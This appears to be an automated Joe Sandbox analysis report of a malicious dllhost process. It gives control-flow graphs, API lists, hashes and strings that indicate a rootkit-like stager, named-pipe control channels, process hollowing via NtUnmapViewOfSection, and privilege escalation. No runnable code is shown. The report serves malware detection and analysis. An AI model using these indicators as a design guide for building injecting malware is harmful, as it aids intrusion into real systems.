                                  • Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 116 140003204-140003225 117 14000322b 116->117 118 14000341d-140003423 116->118 119 140003231-140003237 117->119 120 14000338b-1400033c3 GetProcessHeap HeapAlloc K32EnumProcesses 117->120 121 140003599-1400035bd ReadFile 118->121 122 140003429-14000342c 118->122 123 140003382-140003384 ExitProcess 119->123 124 14000323d-140003240 119->124 125 140003652-140003664 120->125 129 1400033c9-1400033da 120->129 121->125 126 1400035c3-1400035ca 121->126 127 140003432-140003438 122->127 128 14000358f-140003594 call 140001f7c 122->128 131 140003246-140003249 124->131 132 1400032ea-140003315 RegOpenKeyExW 124->132 126->125 133 1400035d0-14000360b GetProcessHeap HeapAlloc call 140001cf0 126->133 134 140003534-140003547 call 1400020fc 127->134 135 14000343e-140003441 127->135 128->125 129->125 136 1400033e0-140003409 call 140001868 * 2 129->136 141 1400032db-1400032e5 131->141 142 14000324f-140003252 131->142 137 140003353-14000337d call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 132->137 138 140003317-14000334d RegDeleteValueW * 3 132->138 159 14000360d-140003613 133->159 160 14000363e-14000364c GetProcessHeap HeapFree 133->160 134->125 162 14000354d-14000355c call 1400020fc 134->162 144 140003443-140003449 135->144 145 140003480-140003491 call 1400020fc 135->145 164 14000340e-140003416 136->164 137->125 138->137 141->125 150 140003254-14000325a 142->150 151 1400032ce-1400032d6 142->151 144->125 153 14000344f-140003479 call 140002c5c call 140002c88 ExitProcess 144->153 145->125 163 140003497-1400034b9 ReadFile 145->163 150->125 158 140003260-140003284 ReadFile 150->158 151->125 158->125 166 14000328a-140003291 158->166 159->160 167 140003615-140003627 159->167 160->125 162->125 184 140003562-14000358a ShellExecuteW 162->184 163->125 170 1400034bf-1400034c6 163->170 164->136 171 140003418 164->171 166->125 173 140003297-1400032c9 call 140001868 * 2 166->173 174 140003629-14000362b 167->174 175 14000362d-140003635 167->175 170->125 178 1400034cc-14000350a GetProcessHeap HeapAlloc ReadFile 170->178 171->125 173->125 174->175 181 140003639 call 140001eec 174->181 175->167 182 140003637 175->182 178->160 185 140003510-14000351c 178->185 181->160 182->160 184->125 185->160 189 140003522-14000352f call 140002434 185->189 189->160
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                  • String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
                                  • API String ID: 4225498131-1538754800
                                  • Opcode ID: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
                                  • Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
                                  • Opcode Fuzzy Hash: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
                                  • Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                  • String ID:
                                  • API String ID: 4084875642-0
                                  • Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                  • Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
                                  • Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                  • Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                  • String ID:
                                  • API String ID: 3197395349-0
                                  • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                  • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                  • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                  • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                  • String ID: .text$C:\Windows\System32\
                                  • API String ID: 2721474350-832442975
                                  • Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                  • Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
                                  • Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                  • Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                  • String ID: M$\\.\pipe\$rbx-childproc
                                  • API String ID: 2203880229-2840927681
                                  • Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                  • Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
                                  • Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                                  • Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 243 140002cb0-140002cba 244 140002cbd-140002cd0 call 140002300 243->244 247 140002cd2-140002cdb Sleep 244->247 248 140002cdd-140002cea ConnectNamedPipe 244->248 247->244 249 140002d21-140002d26 Sleep 248->249 250 140002cec-140002d0d ReadFile 248->250 251 140002d2c-140002d35 DisconnectNamedPipe 249->251 250->251 252 140002d0f-140002d14 250->252 251->248 252->251 253 140002d16-140002d1d call 140003204 252->253 254 140002d1f 253->254 254->251
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                  • String ID: \\.\pipe\$rbx-control
                                  • API String ID: 2071455217-3647231676
                                  • Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                  • Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
                                  • Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                                  • Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 264 140003668-1400036bc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 265 1400036be-1400036d1 K32EnumProcesses 264->265 266 1400036d3-1400036e2 265->266 267 14000371b-140003724 SleepEx 265->267 268 1400036e4-1400036e8 266->268 269 14000370c-140003717 266->269 267->265 270 1400036ea 268->270 271 1400036fb-1400036fe call 1400031c4 268->271 269->267 272 1400036ee-1400036f3 270->272 275 140003702 271->275 273 1400036f5-1400036f9 272->273 274 140003706-14000370a 272->274 273->271 273->272 274->268 274->269 275->274
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess$EnumProcessesSleep
                                  • String ID:
                                  • API String ID: 3676546796-0
                                  • Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                  • Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
                                  • Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                                  • Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                  • String ID:
                                  • API String ID: 1323846700-0
                                  • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                  • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
                                  • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                  • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 306 1c0401ff598-1c0401ff5b3 307 1c0401ff5b6-1c0401ff5df 306->307 308 1c0401ff5e1-1c0401ff5e6 307->308 309 1c0401ff5eb-1c0401ff5f4 307->309 310 1c0401ff676-1c0401ff67f 308->310 311 1c0401ff5f6-1c0401ff5f9 309->311 312 1c0401ff60c 309->312 310->307 313 1c0401ff685-1c0401ff69f 310->313 314 1c0401ff605-1c0401ff60a 311->314 315 1c0401ff5fb-1c0401ff603 311->315 316 1c0401ff611-1c0401ff622 GetStdHandle 312->316 314->316 315->316 317 1c0401ff651-1c0401ff669 316->317 318 1c0401ff624-1c0401ff62f GetFileType 316->318 317->310 319 1c0401ff66b-1c0401ff66f 317->319 318->317 320 1c0401ff631-1c0401ff63c 318->320 319->310 321 1c0401ff645-1c0401ff648 320->321 322 1c0401ff63e-1c0401ff643 320->322 321->310 323 1c0401ff64a-1c0401ff64f 321->323 322->310 323->310
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileHandleType
                                  • String ID:
                                  • API String ID: 3000768030-0
                                  • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                  • Instruction ID: 32d20d8894fb653fcc8e95b84d5b9ec1467fcae6529ebdf8185e6a04f494506c
                                  • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                  • Instruction Fuzzy Hash: 6831BF32650B46C1FB69CB1495806AA6A50FB49FB8F68030DDB6BA73F0CF75D4A1E340

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 288 1c0401cf598-1c0401cf5b3 289 1c0401cf5b6-1c0401cf5df 288->289 290 1c0401cf5eb-1c0401cf5f4 289->290 291 1c0401cf5e1-1c0401cf5e6 289->291 293 1c0401cf60c 290->293 294 1c0401cf5f6-1c0401cf5f9 290->294 292 1c0401cf676-1c0401cf67f 291->292 292->289 295 1c0401cf685-1c0401cf69f 292->295 298 1c0401cf611-1c0401cf622 GetStdHandle 293->298 296 1c0401cf5fb-1c0401cf603 294->296 297 1c0401cf605-1c0401cf60a 294->297 296->298 297->298 299 1c0401cf624-1c0401cf62f GetFileType 298->299 300 1c0401cf651-1c0401cf669 298->300 299->300 302 1c0401cf631-1c0401cf63c 299->302 300->292 301 1c0401cf66b-1c0401cf66f 300->301 301->292 303 1c0401cf63e-1c0401cf643 302->303 304 1c0401cf645-1c0401cf648 302->304 303->292 304->292 305 1c0401cf64a-1c0401cf64f 304->305 305->292
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileHandleType
                                  • String ID:
                                  • API String ID: 3000768030-0
                                  • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                  • Instruction ID: f7504b1b88daa5d9a6f07de7bd1b160aeb076d389091d04c1229f8583652e373
                                  • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                                  • Instruction Fuzzy Hash: 2131B632694B54D1F769CB1495806AA2660F34DFB8F65030EDB6B673F0CB35D461E340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000003.2319649635.000001C03F6E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C03F6E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_3_1c03f6e0000_dllhost.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                  • Instruction ID: 66010a1336349efbcbd62fad13929535b9b1da2a3d19698ef3c06678d10c4935
                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                  • Instruction Fuzzy Hash: 3191267BB41590CBEB518F25D601FED7B99FBA8B98F54A03C9E8907788DA34D812C700

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 324 140002d38-140002d3c call 140002d4c 326 140002d41-140002d43 ExitProcess 324->326
                                  APIs
                                    • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
                                    • Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
                                    • Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
                                    • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
                                    • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
                                    • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
                                    • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
                                    • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
                                    • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
                                    • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
                                    • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
                                    • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
                                    • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
                                    • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
                                    • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
                                    • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
                                  • ExitProcess.KERNEL32 ref: 0000000140002D43
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
                                  • String ID:
                                  • API String ID: 3805535264-0
                                  • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                  • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                  • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                  • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                  • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                  • API String ID: 1036100660-1371749706
                                  • Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                  • Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
                                  • Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
                                  • Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                  • String ID: d
                                  • API String ID: 2005889112-2564639436
                                  • Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                  • Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
                                  • Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
                                  • Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                  • API String ID: 2119608203-3850299575
                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                  • Instruction ID: cfbbca6e415e2c7f8196921807c04c9e792dbd89ccdd68d3b0ec4706a07710ea
                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                  • Instruction Fuzzy Hash: 3EB14972254692C2FB6EDF25D540BEBA3A4F788F88F545016EF0A63BA4DE35C980C340
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                  • API String ID: 2119608203-3850299575
                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                  • Instruction ID: 05c00fcd45c724e7c45cff46a495c915153de125a48bdd352fada8121a307574
                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                  • Instruction Fuzzy Hash: F9B15C72298690C6FB6EDF26D540BDAA3A4FB48F88F545016EF4A63BA4DE35CD40C740
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
